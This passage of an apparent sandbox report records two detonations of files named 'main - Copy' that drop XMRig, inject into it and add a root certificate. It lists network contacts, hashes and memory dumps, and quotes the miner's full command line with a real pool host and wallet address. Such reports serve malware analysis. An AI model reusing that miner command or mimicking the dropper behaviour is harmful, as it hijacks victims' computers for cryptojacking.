memory/3320-42-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-43-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-44-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-45-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-46-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-47-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-48-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-49-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-50-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-51-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-52-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-53-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-54-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-55-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-56-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-57-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-58-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-59-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-60-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-61-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-62-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-63-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-64-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-65-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-66-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-67-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-68-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-69-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-70-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-71-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-72-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-73-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-74-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-75-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-76-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-77-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-78-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-79-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-80-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-81-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-82-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-83-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-84-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:27
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2264 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2264 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1868-16-0x000001DD34AC0000-0x000001DD34AE0000-memory.dmp
memory/1868-17-0x000001DD34B00000-0x000001DD34B20000-memory.dmp
memory/1868-18-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-19-0x000001DD34B20000-0x000001DD34B40000-memory.dmp
memory/1868-20-0x000001DD34B40000-0x000001DD34B60000-memory.dmp
memory/1868-21-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-22-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-25-0x000001DD34B40000-0x000001DD34B60000-memory.dmp
memory/1868-24-0x000001DD34B20000-0x000001DD34B40000-memory.dmp
memory/1868-23-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-26-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-27-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-28-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-29-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-30-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-31-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-32-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-33-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-34-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-35-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-36-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-37-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-38-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-39-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-40-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-41-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-42-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-43-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-44-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-45-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-46-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-47-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-48-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-49-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-50-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-51-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-52-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-53-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-54-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-55-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-56-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-57-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-58-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-59-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-60-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-61-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-62-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-63-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-64-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-65-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-66-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-67-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-68-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-69-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-70-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-71-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-72-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-73-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-74-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-75-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-76-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-77-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-78-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-79-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-80-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-81-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-82-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-83-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-84-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:27
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4156 wrote to memory of 3572 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4156 wrote to memory of 3572 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3572-16-0x000001804DDB0000-0x000001804DDD0000-memory.dmp
memory/3572-17-0x000001804F6B0000-0x000001804F6D0000-memory.dmp
memory/3572-18-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-20-0x000001804F6F0000-0x000001804F710000-memory.dmp
memory/3572-19-0x000001804F6D0000-0x000001804F6F0000-memory.dmp
memory/3572-21-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-22-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-25-0x000001804F6F0000-0x000001804F710000-memory.dmp
memory/3572-24-0x000001804F6D0000-0x000001804F6F0000-memory.dmp
memory/3572-23-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-26-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-27-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-28-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-29-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-30-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
memory/3572-31-0x00007FF64C360000-0x00007FF64CE63000-memory.dmp
